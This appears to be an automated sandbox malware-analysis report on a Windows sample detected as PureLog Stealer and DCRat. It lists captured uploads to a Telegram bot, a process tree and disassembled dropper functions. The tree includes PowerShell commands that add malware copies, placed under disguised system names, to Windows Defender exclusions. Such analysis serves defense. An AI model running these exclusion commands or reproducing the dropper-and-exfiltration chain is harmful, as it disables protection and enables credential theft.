2024-04-28 23:03:08 UTC	4096	OUT	Data Raw: 3e b6 ff 00 34 79 98 ca 52 8e 0b 11 46 ac 7e c5 ec fb ab 34 fd 7c fb 3f 33 9a a3 8a 5a 4e 2b ed ee 7e 60 14 51 45 00 6a f8 67 fe 46 7d 37 fe be 17 f9 d7 b5 92 00 24 90 00 e4 93 5e 29 e1 af f9 19 b4 df fa f8 4f e7 5d ce ba d3 f8 8f c4 ab e1 b8 a6 78 6c 60 88 4f 7e c8 70 5f 3f 75 3f 91 fc 7d ab e7 b3 4a 7e d3 12 93 76 4a 37 7e 97 67 d5 e4 95 3d 9e 11 b4 ae dc ac bd 6c 8d 0b 9f 1c f8 6a d6 66 8a 4d 56 32 c3 af 96 8f 20 fc d4 11 53 2e a9 6b ae 41 14 da 35 cd bd d3 43 2e f6 43 21 42 01 56 5e 78 24 75 f4 ac eb bd 6f c2 9e 13 91 74 d3 14 51 3a 80 5a 38 61 dc 47 a1 63 eb f5 e6 aa ea 97 72 5b 5b 8d 43 c2 5a 45 ac 86 ea 06 96 4b f5 45 0a 15 79 2b 8e 0e e3 e9 fc f1 c7 17 d5 e3 24 b9 62 d5 f6 6e d6 fc bf 56 7a 9f 58 9c 5b e6 92 76 dd 2b df f3 fd 11 9f e3 5d 36 55 b6 Data Ascii: >4yRF~4\|?3ZN+~`QEjgF}7$^)O]xl`O~p_?u?}J~vJ7~g=ljfMV2 S.kA5C.C!BV^x$uotQ:Z8aGcr[[CZEKEy+$bnVzX[v+]6U
2024-04-28 23:03:08 UTC	25	IN	HTTP/1.1 100 Continue
2024-04-28 23:03:09 UTC	1529	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 28 Apr 2024 23:03:09 GMT Content-Type: application/json Content-Length: 1140 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":213,"from":{"id":7126538506,"is_bot":true,"first_name":"MaxVinnik","username":"VinnikOtctyk_bot"},"chat":{"id":-4172696438,"title":"\u0414\u0435\u043d\u0447\u0456\u043a\u0456 \u043c\u0430\u0439\u043d\u0435\u0440\u0438","type":"group","all_members_are_administrators":true},"date":1714345389,"photo":[{"file_id":"AgACAgIAAxkDAAPVZi7VrSzaA3b93aOfPnzLYHWTUpYAAhnbMRsKdHlJuUwljT6avy8BAAMCAANzAAM0BA","file_unique_id":"AQADGdsxGwp0eUl4","file_size":1170,"width":90,"height":72},{"file_id":"AgACAgIAAxkDAAPVZi7VrSzaA3b93aOfPnzLYHWTUpYAAhnbMRsKdHlJuUwljT6avy8BAAMCAANtAAM0BA","file_unique_id":"AQADGdsxGwp0eUly","file_size":15994,"width":320,"height":256},{"file_id":"AgACAgIAAxkDAAPVZi7VrSzaA3b93aOfPnzLYHWTUpYAAhnbMRsKdHlJuUwljT6avy8BAAMCAAN4AAM0BA","file_unique_id":"AQADGdsxGwp0eUl9","file_size":66770,"width":800,"height":640},{"file_id":"AgACAgIAAxkDAAPVZi7VrSzaA3b93aOfPnzLYHWTUpYAAhnbMRsKdHlJuUwljT6avy8BAAMCAAN5AAM0BA","file_unique_id":"AQADGdsxGwp0eUl-","file_size":98253,"width":1280,"h [TRUNCATED]

Target ID:	0
Start time:	01:01:50
Start date:	29/04/2024
Path:	C:\Users\user\Desktop\Vqzx4PFehn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Vqzx4PFehn.exe"
Imagebase:	0x1000000
File size:	1'789'751 bytes
MD5 hash:	1925339CAB9E6A65F43C5F04321156E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1622104471.0000000006DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:01:50
Start date:	29/04/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe"
Imagebase:	0x60000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:02:06
Start date:	29/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:02:06
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:02:06
Start date:	29/04/2024
Path:	C:\portintosvc\driverInto.exe
Wow64 process (32bit):	false
Commandline:	"C:\portintosvc/driverInto.exe"
Imagebase:	0xac0000
File size:	1'930'240 bytes
MD5 hash:	31594886C067C61C60A04365C0E2A58C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1783939727.0000000000AC2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1932393224.0000000013164000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\portintosvc\driverInto.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\portintosvc\driverInto.exe, Author: Joe Security
Antivirus matches:	Detection: 83%, ReversingLabs Detection: 65%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:02:12
Start date:	29/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:02:12
Start date:	29/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:02:12
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x800000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	01:02:12
Start date:	29/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:02:12
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	01:02:12
Start date:	29/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:02:12
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	01:02:12
Start date:	29/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:02:12
Start date:	29/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:02:12
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	01:02:12
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff72bec0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	01:02:12
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	01:02:15
Start date:	29/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\28moAYly7n.bat"
Imagebase:	0x7ff637050000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	01:02:15
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	01:02:16
Start date:	29/04/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6b8ee0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	01:02:17
Start date:	29/04/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7a7820000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	01:02:26
Start date:	29/04/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	01:02:30
Start date:	29/04/2024
Path:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe"
Imagebase:	0x640000
File size:	1'930'240 bytes
MD5 hash:	31594886C067C61C60A04365C0E2A58C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 83%, ReversingLabs Detection: 65%, Virustotal, Browse
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	01:02:34
Start date:	29/04/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.9%
Total number of Nodes:	1523
Total number of Limit Nodes:	28

Executed Functions

Function 0101DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01010863: GetModuleHandleW.KERNEL32(kernel32), ref: 0101087C
Part of subcall function 01010863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0101088E
Part of subcall function 01010863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 010108BF

Part of subcall function 0101A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0101A655

Part of subcall function 0101AC16: OleInitialize.OLE32(00000000), ref: 0101AC2F
Part of subcall function 0101AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0101AC66
Part of subcall function 0101AC16: SHGetMalloc.SHELL32(01048438), ref: 0101AC70

GetCommandLineW.KERNEL32 ref: 0101DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0101DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0101DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 0101DFCE

Part of subcall function 0101DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0101DBF4
Part of subcall function 0101DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0101DC30

CloseHandle.KERNEL32(00000000), ref: 0101DFD7
GetModuleFileNameW.KERNEL32(00000000,0105EC90,00000800), ref: 0101DFF2
SetEnvironmentVariableW.KERNEL32(sfxname,0105EC90), ref: 0101DFFE
GetLocalTime.KERNEL32(?), ref: 0101E009
_swprintf.LIBCMT ref: 0101E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0101E05A
GetModuleHandleW.KERNEL32(00000000), ref: 0101E061
LoadIconW.USER32(00000000,00000064), ref: 0101E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0101E0C9
Sleep.KERNEL32(?), ref: 0101E0F7
DeleteObject.GDI32 ref: 0101E130
DeleteObject.GDI32(?), ref: 0101E140
CloseHandle.KERNEL32 ref: 0101E183

Strings

STARTDLG, xrefs: 0101E0BE
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0101E039
C:\Users\user\Desktop, xrefs: 0101DF33
sfxstime, xrefs: 0101E055
winrarsfxmappingfile.tmp, xrefs: 0101DF77
sfxname, xrefs: 0101DFF9

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-3743209390
Opcode ID: 9ae4e53fa07cffabee9d733d508ffcbb82fdfb9ae3bf8298182d101e8cdaf815
Instruction ID: 169e5dbff5c2af2d6a366f8b436719e9cd35bf404b3d500c8d1c4dd929759af2
Opcode Fuzzy Hash: 9ae4e53fa07cffabee9d733d508ffcbb82fdfb9ae3bf8298182d101e8cdaf815
Instruction Fuzzy Hash: F761E4B1904345AFE331ABA5DD88FAB7BECBB94704F00042DFAC596188DB7E9944C761

Uniqueness

Uniqueness Score: -1.00%

Function 0101A6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0101B73D,00000066), ref: 0101A6D5
SizeofResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A6EC
LoadResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A703
LockResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0101B73D,00000066), ref: 0101A72D
GlobalLock.KERNEL32(00000000,?,?,?,?,?,0101B73D,00000066), ref: 0101A73E
GlobalUnlock.KERNEL32(00000000), ref: 0101A7C6

Part of subcall function 0101A626: GdipAlloc.GDIPLUS(00000010), ref: 0101A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0101A7A7
GlobalFree.KERNEL32(00000000), ref: 0101A7CD

Strings

PNG, xrefs: 0101A6C6

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: 739d73e14f89f938e97ed8374bbc93139787008195f7fc628babe2d6d169dd23
Instruction ID: e05d5d054f1fd598029e52923233c4dccdc7b72c1e9bcef851d0c4173ac94a04
Opcode Fuzzy Hash: 739d73e14f89f938e97ed8374bbc93139787008195f7fc628babe2d6d169dd23
Instruction Fuzzy Hash: 4F318F75601342AFD7219F65DC88D2B7FBCFF84661B000959F986C7218EB3AD8448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0100A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6C4

Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A728
GetLastError.KERNEL32(?,?,?,?,0100A592,000000FF,?,?), ref: 0100A734

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: b836a4f60e53b1d4c5fde3395dd085f2cc390187ab7799c6322274763df0cbb3
Instruction ID: 82c9a94e331b1a8179dbaa81df9ac3a2e6ae24bb7387d15eb40314522a7b4148
Opcode Fuzzy Hash: b836a4f60e53b1d4c5fde3395dd085f2cc390187ab7799c6322274763df0cbb3
Instruction Fuzzy Hash: 56412F76600615EBDB26DF68CC84AE9B7B8FB48350F144196E59ED3240D7346E94CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01027DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,01027DC4,?,0103C300,0000000C,01027F1B,?,00000002,00000000), ref: 01027E0F
TerminateProcess.KERNEL32(00000000,?,01027DC4,?,0103C300,0000000C,01027F1B,?,00000002,00000000), ref: 01027E16
ExitProcess.KERNEL32 ref: 01027E28

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: a410e23ef94be68e1cac884ec0301330f63077dd553ce9f0ac4f4a74ece202a6
Instruction ID: ae39228f06da8265e714d8c693e5ad332db803b3f5f0ebbb7755172de69e6e96
Opcode Fuzzy Hash: a410e23ef94be68e1cac884ec0301330f63077dd553ce9f0ac4f4a74ece202a6
Instruction Fuzzy Hash: 2FE04F31000154ABCF126F54C988A89BF69FB24341B004454F8898A136CB3ADD51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0100848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01008493

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 22ec30648c534783435bb39f0f843adf69be1c7dcfaf1e3e17cf1192d79e5e1a
Instruction ID: 1d3ccae0047f45bdf272886294366b4efea02d71dc036bfcf140d33b340f05a1
Opcode Fuzzy Hash: 22ec30648c534783435bb39f0f843adf69be1c7dcfaf1e3e17cf1192d79e5e1a
Instruction Fuzzy Hash: D082C870D04246AEFF57DB68C894BFABBA9BF15200F0881FAD9C95B1C2D7715684CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01016CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d6cb024642a0db74c5ccd9d3bd35713dd9e44ee199d701f397fb74626fa72a33
Instruction ID: 1295bdb183c298edae024026743835133a9c81a3da7a28f0726a572f251ba9b8
Opcode Fuzzy Hash: d6cb024642a0db74c5ccd9d3bd35713dd9e44ee199d701f397fb74626fa72a33
Instruction Fuzzy Hash: 0FD1E571A083418FDB25DF28C84079BBBE1BF89308F08456DF9C99B24AD779E944CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0101B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0101B7E5

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
